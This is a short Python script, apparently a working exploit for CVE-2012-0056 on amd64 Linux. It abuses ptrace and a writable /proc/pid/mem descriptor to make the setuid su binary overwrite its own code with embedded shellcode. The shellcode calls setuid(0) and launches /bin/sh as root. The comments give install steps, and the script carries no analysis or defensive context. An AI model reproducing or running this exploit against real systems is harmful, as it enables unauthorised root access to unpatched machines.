#!/usr/bin/python
# CVE-2012-0056 amd64
# sd@fucksheep.org
#
# hg clone https://bitbucket.org/haypo/python-ptrace
# (cd python-ptrace && ./setup.py install --home=~)
# hg clone https://code.google.com/p/python-passfd
# (cd python-passfd && ./setup.py install --home=~)
# PYTHONPATH=~/lib/python ./hurrdurr.py
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
from ptrace.binding import *
from time import *


if argv[-1]=='hax':
	sk=int(argv[1])
	fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
	lseek(fd,int(argv[2]),0)
	sendfd(sk,fd)
else:
	r,w=pipe()
	pid=fork()
	if not pid:
		dup2(w,2)
		ptrace_traceme()
		execl("/bin/su","su","h4x0rr")
	wait()
	while ptrace_getregs(pid).orig_rax not in (60,231):
		ptrace_syscall(pid)
		wait()
	rip=filter(lambda x: x>0x00400000 and x<0x09000000,
		[ptrace_peektext(pid,
		ptrace_getregs(pid).rsp+i) for i in range(0,256,8)])[0]
	data=(ptrace_peektext(pid,(rip-4)&(~7))|ptrace_peektext(pid,(rip+4)&(~7))<<64)
	rip=((rip+(data>>(((rip-4)&7)*8)))&0xffffffff)-read(r,32).find('h4x0rr')
	a,b=socketpair()
	if not fork():
		execl("/usr/bin/python","python",
		      __file__,str(a.fileno()),str(rip),'hax')
	dup2(recvfd(b)[0],2)
	execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
		"\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
		"\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
		"\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");